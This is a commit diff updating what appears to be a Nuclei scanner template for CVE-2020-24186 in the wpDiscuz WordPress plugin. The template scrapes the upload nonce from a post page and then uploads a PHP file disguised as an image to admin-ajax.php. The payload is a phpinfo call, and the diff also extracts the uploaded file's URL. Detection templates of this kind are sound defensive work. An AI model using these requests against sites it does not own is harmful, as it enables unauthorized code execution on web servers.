template update
sandeep
parent
470ce55003
commit
83fd749b4e
|
|
@ -1,54 +1,89 @@
|
||||||
id: CVE-2020-24186
|
id: CVE-2020-24186
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Unauthenticated arbitrary file upload wpDiscuz WordPress plugin
|
name: Unauthenticated File upload wpDiscuz WordPress plugin RCE
|
||||||
author: Ganofins
|
author: Ganofins
|
||||||
severity: high
|
severity: high
|
||||||
description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server.
|
description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server.
|
||||||
reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
|
reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
|
||||||
tags: cve,cve2020,wordpress,wp-plugin
|
tags: cve,cve2020,wordpress,wp-plugin,rce
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
GET /?p=1 HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Length: 774
|
|
||||||
Accept: */*
|
Accept: */*
|
||||||
X-Requested-With: XMLHttpRequest
|
|
||||||
User-Agent:
|
|
||||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUGWBOKSwsalnzhha
|
|
||||||
Accept-Encoding: gzip, deflate
|
|
||||||
Accept-Language: en-US,en;q=0.9
|
|
||||||
Cookie:
|
|
||||||
Connection: close
|
Connection: close
|
||||||
|
|
||||||
------WebKitFormBoundaryUGWBOKSwsalnzhha
|
- |
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Length: 745
|
||||||
|
Accept: */*
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
sec-ch-ua-mobile: ?0
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
|
||||||
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
|
||||||
|
Origin: {{BaseURL}}
|
||||||
|
Sec-Fetch-Site: same-origin
|
||||||
|
Sec-Fetch-Mode: cors
|
||||||
|
Sec-Fetch-Dest: empty
|
||||||
|
Referer: {{BaseURL}}
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
||||||
Content-Disposition: form-data; name="action"
|
Content-Disposition: form-data; name="action"
|
||||||
|
|
||||||
wmuUploadFiles
|
wmuUploadFiles
|
||||||
------WebKitFormBoundaryUGWBOKSwsalnzhha
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
||||||
Content-Disposition: form-data; name="wmu_nonce"
|
Content-Disposition: form-data; name="wmu_nonce"
|
||||||
|
|
||||||
aede3ab0b2
|
{{wmuSecurity}}
|
||||||
------WebKitFormBoundaryUGWBOKSwsalnzhha
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
||||||
Content-Disposition: form-data; name="wmuAttachmentsData"
|
Content-Disposition: form-data; name="wmuAttachmentsData"
|
||||||
|
|
||||||
undefined
|
undefined
|
||||||
------WebKitFormBoundaryUGWBOKSwsalnzhha
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
||||||
Content-Disposition: form-data; name="wmu_files[0]"; filename="hello.php"
|
Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php"
|
||||||
Content-Type: image/jpeg
|
Content-Type: image/png
|
||||||
|
|
||||||
ÿØÿájExifMM*<2A><><EFBFBD>i<EFBFBD><69>><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>¨<EFBFBD><C2A8><EFBFBD><EFBFBD>À<EFBFBD><C380><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ÿà<C3BF>JFIF<49><46><EFBFBD><EFBFBD>ÿÛC<C39B><43><EFBFBD>
|
{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
|
||||||
<EFBFBD><EFBFBD>
|
|
||||||
<?php phpinfo();?>
|
<?php phpinfo();?>
|
||||||
------WebKitFormBoundaryUGWBOKSwsalnzhha
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
||||||
Content-Disposition: form-data; name="postId"
|
Content-Disposition: form-data; name="postId"
|
||||||
|
|
||||||
|
1
|
||||||
|
------WebKitFormBoundary88AhjLimsDMHU1Ak--
|
||||||
|
|
||||||
393
|
extractors:
|
||||||
------WebKitFormBoundaryUGWBOKSwsalnzhha--
|
- type: regex
|
||||||
|
part: body
|
||||||
|
internal: true
|
||||||
|
name: wmuSecurity
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- 'wmuSecurity":"([a-z0-9]+)'
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '"url":"([a-z:\\/0-9-.]+)"'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'success":true'
|
||||||
|
- 'fullname'
|
||||||
|
- 'shortname'
|
||||||
|
- 'url'
|
||||||
|
condition: and
|
||||||
|
part: body
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue